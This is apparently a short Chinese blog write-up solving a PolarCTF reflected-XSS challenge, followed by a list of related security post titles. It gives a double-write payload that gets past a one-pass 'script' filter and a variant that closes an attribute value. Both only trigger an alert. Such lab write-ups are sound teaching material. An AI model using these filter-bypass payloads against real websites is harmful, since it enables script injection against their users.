【PolarCTF】浮生日记

很明显是个XSS,尝试常规语句发现会过滤script

尝试双写

复制代码
<scscriptript>alert(123)</scscriptript>

可以看到只过滤了一次<script>,但是还没有触发弹窗

我们看下源代码,发现需要对value进行闭合

那么payload如下:

复制代码
"><scscriptript>alert(123)</scscriptript>
相关推荐
小小邵同学6 小时前
jsp payload解析
网络安全
土豆.exe8 小时前
OpenClaw 安全保险箱怎么做?从 ClawVault 看 AI Agent 的原子化控制、检测与限额
人工智能·网络安全·ai安全·openclaw
Chengbei1110 小时前
Chrome浏览器渗透利器支持原生扫描!JS 端点 + 敏感目录 + 原型污染自动化检测|VulnRadar
javascript·chrome·安全·web安全·网络安全·自动化·系统安全
ShoreKiten14 小时前
DC-3靶机渗透--CTFer从0到1的进阶之路
安全·网络安全·渗透测试
网安情报局16 小时前
2026网络安全六大确定性趋势
大数据·人工智能·网络安全
大方子16 小时前
【PolarCTF】session文件包含
网络安全·polarctf
网云工程师手记17 小时前
深信服零信任 aTrust 对接 Keycloak(OIDC)实战指南
网络·网络安全·零信任·oauth2·sso单点登录·企业身份认证
未知鱼17 小时前
Python安全开发asyncio(异步IO与高并发)
python·安全·网络安全·github
Ho1aAs17 小时前
『OpenClaw安全』CVE-2026-25253:ClawJacked One-Click RCE
安全·web安全·网络安全·ai·智能体·agent安全·openclaw
XuanTao771 天前
【分享】Lightroom高级版⭕Ai图片剪辑 天空修补
数码相机·计算机网络·网络安全·软件工程·软件构建